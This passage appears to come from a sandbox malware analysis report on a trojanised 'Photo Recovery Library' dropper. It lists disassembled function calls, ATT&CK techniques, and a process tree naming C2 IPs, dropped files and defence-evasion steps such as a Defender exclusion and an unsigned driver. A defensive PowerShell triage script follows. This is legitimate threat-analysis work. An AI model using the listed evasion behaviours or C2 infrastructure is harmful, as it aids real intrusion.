            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe Code function: 14_2_6096A5EE sqlite3_value_text,sqlite3_value_bytes,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_malloc,sqlite3_column_int,sqlite3_column_int64,sqlite3_column_text,sqlite3_column_bytes,sqlite3_finalize,sqlite3_step,sqlite3_free,sqlite3_finalize,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_column_int64,sqlite3_column_int,sqlite3_column_text,sqlite3_column_bytes,sqlite3_step,sqlite3_finalize,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_malloc,sqlite3_bind_null,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_value_text,sqlite3_value_bytes,sqlite3_free,14_2_6096A5EE
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe Code function: 14_2_6094B54C sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,memmove,14_2_6094B54C
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe Code function: 14_2_60925686 sqlite3_bind_int64,sqlite3_mutex_leave,14_2_60925686
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe Code function: 14_2_6094A6C5 sqlite3_bind_int64,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_malloc,sqlite3_reset,sqlite3_free,14_2_6094A6C5
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe Code function: 14_2_609256E5 sqlite3_bind_int,sqlite3_bind_int64,14_2_609256E5
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe Code function: 14_2_6094B6ED sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,14_2_6094B6ED
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe Code function: 14_2_6092562A sqlite3_bind_blob,14_2_6092562A
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe Code function: 14_2_60925655 sqlite3_bind_null,sqlite3_mutex_leave,14_2_60925655
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe Code function: 14_2_6094C64A sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,14_2_6094C64A
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe Code function: 14_2_609687A7 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_column_int64,sqlite3_reset,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,14_2_609687A7
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe Code function: 14_2_6095F7F7 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,14_2_6095F7F7
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe Code function: 14_2_6092570B sqlite3_bind_double,sqlite3_mutex_leave,14_2_6092570B
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe Code function: 14_2_6095F772 sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,14_2_6095F772
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe Code function: 14_2_60925778 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_blob,14_2_60925778
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe Code function: 14_2_6090577D sqlite3_bind_parameter_name,14_2_6090577D
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe Code function: 14_2_6094B764 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,14_2_6094B764
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe Code function: 14_2_6090576B sqlite3_bind_parameter_count,14_2_6090576B
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe Code function: 14_2_6094A894 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,14_2_6094A894
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe Code function: 14_2_6095F883 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,14_2_6095F883
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe Code function: 14_2_6094C8C2 sqlite3_value_int,sqlite3_value_int,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_null,sqlite3_bind_null,sqlite3_step,sqlite3_reset,14_2_6094C8C2
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe Code function: 14_2_6096281E sqlite3_mprintf,sqlite3_vtab_config,sqlite3_malloc,sqlite3_mprintf,sqlite3_mprintf,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_exec,sqlite3_free,sqlite3_prepare_v2,sqlite3_bind_text,sqlite3_step,sqlite3_column_int64,sqlite3_finalize,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_errmsg,sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_free,sqlite3_declare_vtab,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,14_2_6096281E
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe Code function: 14_2_6096583A memcmp,sqlite3_realloc,qsort,sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_step,sqlite3_reset,14_2_6096583A
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe Code function: 14_2_6095F9AD sqlite3_bind_int,sqlite3_step,sqlite3_column_type,sqlite3_reset,14_2_6095F9AD
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe Code function: 14_2_6094A92B sqlite3_bind_int64,sqlite3_bind_null,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,14_2_6094A92B
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe Code function: 14_2_6090EAE5 sqlite3_transfer_bindings,14_2_6090EAE5
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe Code function: 14_2_6095FB98 sqlite3_value_int,sqlite3_bind_int,sqlite3_bind_value,sqlite3_step,sqlite3_reset,14_2_6095FB98
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe Code function: 14_2_6095ECA6 sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value,14_2_6095ECA6
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe Code function: 14_2_6095FCCE sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,14_2_6095FCCE
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe Code function: 14_2_6095FDAE sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,14_2_6095FDAE
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe Code function: 14_2_60966DF1 sqlite3_value_text,sqlite3_mprintf,sqlite3_free,strcmp,sqlite3_free,sqlite3_malloc,sqlite3_bind_int64,sqlite3_step,sqlite3_column_type,sqlite3_reset,sqlite3_column_blob,sqlite3_reset,sqlite3_malloc,sqlite3_free,sqlite3_reset,sqlite3_result_error_code,sqlite3_result_blob,14_2_60966DF1
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe Code function: 14_2_60969D75 sqlite3_bind_int,sqlite3_step,sqlite3_column_int,sqlite3_reset,14_2_60969D75
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe Code function: 14_2_6095FFB2 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code,14_2_6095FFB2
            MITRE ATT&CK Matrix

            Techniques with at least one matched signature, grouped by tactic. The number in parentheses is the count badge shown in the matrix cell for that technique.

            Execution: Windows Management Instrumentation (1); Native API (2); Command and Scripting Interpreter (2); Service Execution (2)
            Persistence: LSASS Driver (2); DLL Side-Loading (1); Windows Service (24); Bootkit (1)
            Privilege Escalation: Exploitation for Privilege Escalation (1); LSASS Driver (2); DLL Side-Loading (1); Access Token Manipulation (1); Windows Service (24); Process Injection (412)
            Defense Evasion: Disable or Modify Tools (21); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (4); Software Packing (21); DLL Side-Loading (1); File Deletion (1); Masquerading (11); Virtualization/Sandbox Evasion (61); Access Token Manipulation (1); Process Injection (412); Bootkit (1)
            Discovery: System Time Discovery (11); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (47); Security Software Discovery (281); Virtualization/Sandbox Evasion (61); Process Discovery (2); Application Window Discovery (11); System Owner/User Discovery (3); System Network Configuration Discovery (1)
            Collection: Archive Collected Data (11)
            Command and Control: Ingress Tool Transfer (12); Encrypted Channel (21); Non-Standard Port (1); Non-Application Layer Protocol (1); Application Layer Protocol (22)
            Impact: System Shutdown/Reboot (1)

            Tactics with no matched technique: Reconnaissance, Resource Development, Initial Access, Credential Access, Lateral Movement, Exfiltration
            Behavior Graph

            Behavior Graph ID: 1632175; Sample: dxRwXy19pq.exe; Startdate: 07/03/2025; Architecture: WINDOWS; Score: 100

            Top-level signatures: Antivirus detection for URL or domain; Antivirus detection for dropped file; Antivirus / Scanner detection for submitted sample; 11 other signatures

            Process tree, with network contacts (IP, ports, ASN, country), dropped files and per-process signatures:

            dxRwXy19pq.exe
                Network: 91.240.118.49 (ports 443, 49687; GLOBALLAYERNL; country unknown); 104.168.28.10 (ports 49684, 49691, 49694; AS-COLOCROSSINGUS; United States)
                Dropped: ded120f6-6c1d-18da-bc8d-0195720b2895.exe (PE32+); 873bfcef-4c55-422e-88ba-1a31e36a0f58.exe (PE32); C:\Users\user\AppData\Local\...\001[1].exe (PE32+); C:\Users\user\AppData\Local\...\silk[1].exe (PE32)
                Signatures: Detected unpacking (changes PE section rights); Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                873bfcef-4c55-422e-88ba-1a31e36a0f58.exe
                    Dropped: 873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp (PE32)
                    873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp
                        Dropped: C:\Users\user\AppData\Local\...\_shfoldr.dll (PE32); C:\Users\user\AppData\Local\...\_setup64.tmp (PE32+); C:\Users\user\AppData\Local\...\_iscrypt.dll (PE32); 21 other malicious files
                        photorecoverylib59.exe
                            Network: 176.113.115.96 (ports 443, 49718, 49720; SELECTELRU; Russian Federation); 45.93.20.230 (ports 2024, 49719, 49722; COGENT-174US; Netherlands)
                            Dropped: C:\ProgramData\PhotoRecoveryLib\sqlite3.dll (PE32); C:\ProgramData\...\PhotoRecoveryLib.exe (PE32)
                ded120f6-6c1d-18da-bc8d-0195720b2895.exe
                    Dropped: C:\Users\user\AppData\...\d.ghSlh.exe (copy) (PE32+)
                    Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Writes to foreign memory regions; 3 other signatures
                    vbc.exe
                        Network: 127.0.0.1
                        Dropped: C:\Windows\Temp\VzUtW_3288.sys (PE32+)
                        Signatures: Adds a directory exclusion to Windows Defender; Sample is not signed and drops a device driver
                        powershell.exe
                            Signatures: Loading BitLocker PowerShell Module
                            conhost.exe
                            WmiPrvSE.exe
                        powershell.exe
                            conhost.exe
            svchost.exe
                Signatures: Changes security center settings (notifications, updates, antivirus, firewall)
                MpCmdRun.exe
                    conhost.exe
            svchost.exe
            3 other processes
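A host-side triage script for the artifacts this report attributes to the sample, added here as a worked example; it is not part of the Joe Sandbox report and not code from the sample or its analysts. The indicator values (the Windows Defender exclusion, the Security Center key, the GuardFox, Photo Recovery Library 5.9 and PhotoRecoveryLib drop directories, the .sys dropped to C:\Windows\Temp, and the four remote IPs) come from the report; the function names, the output shape, and the reading of 2024 as the remote port for 45.93.20.230 are this example's own assumptions.

```powershell
# Host triage for the artifacts this report attributes to the sample.
# Added example, not part of the Joe Sandbox report. Indicator values (paths,
# IPs, registry key) are taken from the report; function names, the output
# shape and the remote-port interpretation noted below are this example's own.
# Run from an elevated PowerShell: Get-MpPreference hides exclusion lists from
# non-administrators on current Windows builds.

# Endpoints from the behavior graph. The report lists "45.93.20.230, 2024, 49719, 49722";
# this example assumes 2024 is the remote port and the rest are local ports.
# For 104.168.28.10 only ephemeral-looking ports are listed, so any remote port matches.
$C2Endpoints = @(
    [pscustomobject]@{ Ip = '91.240.118.49';  Port = 443;   Note = 'GLOBALLAYERNL, contacted by dxRwXy19pq.exe' }
    [pscustomobject]@{ Ip = '104.168.28.10';  Port = $null; Note = 'AS-COLOCROSSINGUS, contacted by dxRwXy19pq.exe' }
    [pscustomobject]@{ Ip = '176.113.115.96'; Port = 443;   Note = 'SELECTELRU, contacted by photorecoverylib59.exe' }
    [pscustomobject]@{ Ip = '45.93.20.230';   Port = 2024;  Note = 'COGENT-174US, non-standard port, photorecoverylib59.exe' }
)

# Drop locations from the report, resolved for the current user.
$DropDirs = @(
    (Join-Path $env:LOCALAPPDATA 'Temp\GuardFox'),
    (Join-Path $env:LOCALAPPDATA 'Photo Recovery Library 5.9'),
    'C:\ProgramData\PhotoRecoveryLib'
)

function New-Finding([string]$Type, [string]$Value, [string]$Detail = '') {
    [pscustomobject]@{ Type = $Type; Value = $Value; Detail = $Detail }
}

function Get-DefenderExclusionFindings {
    # vbc.exe added a directory exclusion through a base64-encoded MpPreference cmdlet.
    # Any exclusion that points into a user-writable location deserves a look.
    $pref = Get-MpPreference
    foreach ($p in @($pref.ExclusionPath))    { if ($p) { New-Finding 'DefenderExclusionPath' $p } }
    foreach ($p in @($pref.ExclusionProcess)) { if ($p) { New-Finding 'DefenderExclusionProcess' $p } }
}

function Get-SecurityCenterFindings {
    # The sandbox saw svchost.exe write HKLM\SOFTWARE\Microsoft\Security Center\cval.
    # The Security Center service writes this value during normal operation as well,
    # so report it as context to compare with a known-good host, not as an indicator by itself.
    $item = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Security Center' -ErrorAction SilentlyContinue
    if ($item -and ($item.PSObject.Properties.Name -contains 'cval')) {
        New-Finding 'SecurityCenterValue' "cval=$($item.cval)" 'compare with baseline'
    }
}

function Get-DropDirFindings {
    foreach ($dir in $DropDirs) {
        if (-not (Test-Path -LiteralPath $dir)) { continue }
        Get-ChildItem -LiteralPath $dir -Recurse -File -ErrorAction SilentlyContinue | ForEach-Object {
            $hash = (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
            New-Finding 'FileInDropDir' $_.FullName "sha256=$hash"
        }
    }
}

function Get-TempDriverFindings {
    # vbc.exe dropped C:\Windows\Temp\VzUtW_3288.sys and the sample is unsigned:
    # report every .sys in Windows\Temp that lacks a valid Authenticode signature.
    Get-ChildItem -Path (Join-Path $env:SystemRoot 'Temp') -Filter '*.sys' -File -ErrorAction SilentlyContinue | ForEach-Object {
        $sig = Get-AuthenticodeSignature -FilePath $_.FullName
        if ($sig.Status -ne 'Valid') { New-Finding 'DriverInTemp' $_.FullName "signature=$($sig.Status)" }
    }
}

function Get-C2ConnectionFindings {
    $conns = Get-NetTCPConnection -ErrorAction SilentlyContinue
    foreach ($e in $C2Endpoints) {
        $hits = $conns | Where-Object {
            $_.RemoteAddress -eq $e.Ip -and ($null -eq $e.Port -or $_.RemotePort -eq $e.Port)
        }
        foreach ($h in $hits) {
            $proc = Get-Process -Id $h.OwningProcess -ErrorAction SilentlyContinue
            New-Finding 'C2Connection' "$($h.RemoteAddress):$($h.RemotePort)" "pid=$($h.OwningProcess) $($proc.ProcessName) [$($e.Note)]"
        }
    }
}

$findings = @(
    Get-DefenderExclusionFindings
    Get-SecurityCenterFindings
    Get-DropDirFindings
    Get-TempDriverFindings
    Get-C2ConnectionFindings
)
$findings | Format-Table -AutoSize
```

The checks are ordered by how specific they are to this sample: a Defender exclusion or a file under GuardFox or PhotoRecoveryLib is strong evidence on its own, an unsigned driver in Windows\Temp is worth pulling for analysis, and a live connection to one of the listed IPs identifies the process to collect. The cval value is included only because the report lists it; on its own it is not evidence of compromise.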
